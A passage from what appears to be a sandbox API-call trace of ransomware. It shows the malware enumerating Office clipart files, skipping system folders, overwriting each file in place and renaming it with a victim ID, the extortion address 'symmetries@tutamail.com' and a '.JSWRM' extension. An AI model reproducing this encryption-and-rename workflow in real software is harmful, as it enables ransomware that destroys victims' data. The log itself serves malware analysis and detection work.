0x240f48 [0092.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTDR_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTDR_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTDR_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.633] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6644) returned 1 [0092.633] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19f0) returned 0x205850 [0092.633] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x19f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x19f0, lpOverlapped=0x0) returned 1 [0092.648] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.648] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x19f0, lpOverlapped=0x0) returned 1 [0092.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.649] CloseHandle (hObject=0x314) returned 1 [0092.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0092.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0092.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0092.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0092.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0092.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.649] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OUTDR_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\outdr_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0092.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.650] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a6b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PAPER_01.MID", cAlternateFileName="")) returned 1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2=".") returned 1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="..") returned 1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="...") returned 1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="windows") returned -1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="recovery") returned -1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="perflogs") returned -1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="documents and settings") returned 1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="system volume information") returned -1 [0092.650] lstrcmpiW (lpString1="PAPER_01.MID", lpString2="msocache") returned 1 [0092.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PAPER_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PAPER_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PAPER_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0092.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PAPER_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PAPER_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PAPER_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0092.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0092.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.651] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6763) returned 1 [0092.651] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a60) returned 0x205850 [0092.652] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a60, lpOverlapped=0x0) returned 1 [0092.653] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.653] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a60, lpOverlapped=0x0) returned 1 [0092.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.653] CloseHandle (hObject=0x314) returned 1 [0092.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0092.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0092.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0092.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0092.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0092.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.654] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0092.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.655] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x195b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_01.MID", cAlternateFileName="")) returned 1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2=".") returned 1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="..") returned 1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="...") returned 1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="windows") returned -1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="recovery") returned -1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="perflogs") returned -1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="documents and settings") returned 1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="system volume information") returned -1 [0092.655] lstrcmpiW (lpString1="PARNT_01.MID", lpString2="msocache") returned 1 [0092.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0092.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.656] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6491) returned 1 [0092.656] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1950) returned 0x205850 [0092.656] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1950, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1950, lpOverlapped=0x0) returned 1 [0092.658] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.658] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1950, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1950, lpOverlapped=0x0) returned 1 [0092.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.658] CloseHandle (hObject=0x314) returned 1 [0092.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0092.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0092.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0092.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0092.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0092.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0092.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0092.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0092.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0092.659] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1652, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_02.MID", cAlternateFileName="")) returned 1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2=".") returned 1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="..") returned 1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="...") returned 1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="windows") returned -1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="recovery") returned -1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="perflogs") returned -1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="documents and settings") returned 1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="system volume information") returned -1 [0092.659] lstrcmpiW (lpString1="PARNT_02.MID", lpString2="msocache") returned 1 [0092.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_02.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_02.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_02.MID", lpUsedDefaultChar=0x0) returned 12 [0092.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0092.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_02.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_02.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_02.MID", lpUsedDefaultChar=0x0) returned 12 [0092.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0092.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.661] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5714) returned 1 [0092.661] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | 